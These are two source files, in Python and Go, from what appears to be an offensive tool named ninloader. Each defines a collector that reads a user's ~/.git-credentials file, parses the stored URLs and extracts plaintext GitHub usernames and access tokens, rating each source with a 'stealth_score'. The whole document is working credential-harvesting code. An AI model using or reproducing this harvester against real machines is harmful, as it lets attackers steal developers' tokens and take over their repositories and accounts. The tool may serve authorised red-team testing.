File: ninloader/ninloader/collectors/github/git_credentials.py
"""Git credentials file parser — reads ~/.git-credentials URL format."""

from __future__ import annotations

import re
from typing import List
from urllib.parse import urlparse

from ..base import BaseCollector
from .. import CollectorRegistry
from ...types import CollectedToken, DiscoveredToken
from ...secure import secure
from ...platform_utils import git_credentials_path


@CollectorRegistry.register
class GitCredentialsCollector(BaseCollector):
    service = "github"
    source = "git_credentials"
    stealth_score = 5

    def _parse_credentials(self, text: str) -> list:
        """Parse .git-credentials file.

        Format: https://user:token@github.com
        """
        entries = []
        for line in text.strip().splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            try:
                parsed = urlparse(line)
                if parsed.hostname and parsed.password:
                    entries.append({
                        "host": parsed.hostname,
                        "username": parsed.username or "",
                        "token": parsed.password,
                        "scheme": parsed.scheme,
                    })
            except Exception:
                continue
        return entries

    def discover(self) -> List[DiscoveredToken]:
        results = []
        path = git_credentials_path()
        if not path.exists():
            return results

        try:
            text = path.read_text()
            entries = self._parse_credentials(text)

            for entry in entries:
                if "github" not in entry["host"].lower():
                    continue  # Only GitHub entries

                results.append(DiscoveredToken(
                    service=self.service,
                    source=self.source,
                    path=str(path),
                    account_hint=f"{entry['username']}@{entry['host']}",
                    stealth_score=self.stealth_score,
                ))
        except Exception as e:
            self._warn(f"Failed to parse {path}: {e}")

        return results

    def collect(self) -> List[CollectedToken]:
        results = []
        path = git_credentials_path()
        if not path.exists():
            return results

        try:
            text = path.read_text()
            entries = self._parse_credentials(text)

            for entry in entries:
                if "github" not in entry["host"].lower():
                    continue

                results.append(CollectedToken(
                    service=self.service,
                    source=self.source,
                    stealth_score=self.stealth_score,
                    username=entry["username"],
                    access_token=secure(entry["token"]),
                    extra={
                        "host": entry["host"],
                        "scheme": entry["scheme"],
                    },
                ))
        except Exception as e:
            self._warn(f"Failed to collect from {path}: {e}")

        return results

File: ninloader/go/collectors/github/git_credentials.go
package github

import (
	"fmt"
	"net/url"
	"os"
	"strings"

	"github.com/ninken/ninloader-go/internal/collector"
	"github.com/ninken/ninloader-go/internal/platform"
	"github.com/ninken/ninloader-go/internal/registry"
	"github.com/ninken/ninloader-go/internal/types"
)

func init() {
	registry.Register("github", "git_credentials", func() collector.Collector {
		return &GitCredentialsCollector{BaseCollector: collector.BaseCollector{Svc: "github", Src: "git_credentials"}}
	})
}

// GitCredentialsCollector parses ~/.git-credentials for GitHub entries.
type GitCredentialsCollector struct {
	collector.BaseCollector
}

func (c *GitCredentialsCollector) Service() string      { return c.Svc }
func (c *GitCredentialsCollector) Source() string        { return c.Src }
func (c *GitCredentialsCollector) StealthScore() int     { return 5 }
func (c *GitCredentialsCollector) Platforms() []string   { return nil }

type credEntry struct {
	host     string
	username string
	token    string
	scheme   string
}

// parseCredentials parses .git-credentials file.
// Format: https://user:token@github.com
func (c *GitCredentialsCollector) parseCredentials(text string) []credEntry {
	var entries []credEntry
	for _, line := range strings.Split(strings.TrimSpace(text), "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		parsed, err := url.Parse(line)
		if err != nil {
			continue
		}
		if parsed.Hostname() == "" {
			continue
		}
		password, _ := parsed.User.Password()
		if password == "" {
			continue
		}
		entries = append(entries, credEntry{
			host:     parsed.Hostname(),
			username: parsed.User.Username(),
			token:    password,
			scheme:   parsed.Scheme,
		})
	}
	return entries
}

func (c *GitCredentialsCollector) Discover() []*types.DiscoveredToken {
	var results []*types.DiscoveredToken

	path := platform.GitCredentialsPath()
	if _, err := os.Stat(path); err != nil {
		return results
	}

	data, err := os.ReadFile(path)
	if err != nil {
		c.Warn(fmt.Sprintf("Failed to read %s: %v", path, err))
		return results
	}

	entries := c.parseCredentials(string(data))
	for _, entry := range entries {
		if !strings.Contains(strings.ToLower(entry.host), "github") {
			continue
		}
		results = append(results, &types.DiscoveredToken{
			Service:      c.Svc,
			Source:       c.Src,
			Path:         path,
			AccountHint:  fmt.Sprintf("%s@%s", entry.username, entry.host),
			StealthScore: 5,
		})
	}

	return results
}

func (c *GitCredentialsCollector) Collect() []*types.CollectedToken {
	var results []*types.CollectedToken

	path := platform.GitCredentialsPath()
	if _, err := os.Stat(path); err != nil {
		return results
	}

	data, err := os.ReadFile(path)
	if err != nil {
		c.Warn(fmt.Sprintf("Failed to collect from %s: %v", path, err))
		return results
	}

	entries := c.parseCredentials(string(data))
	for _, entry := range entries {
		if !strings.Contains(strings.ToLower(entry.host), "github") {
			continue
		}
		tok := types.NewCollectedToken(c.Svc, c.Src, 5)
		tok.Username = entry.username
		tok.AccessToken = types.Secure(entry.token)
		tok.Extra["host"] = entry.host
		tok.Extra["scheme"] = entry.scheme
		results = append(results, tok)
	}

	return results
}
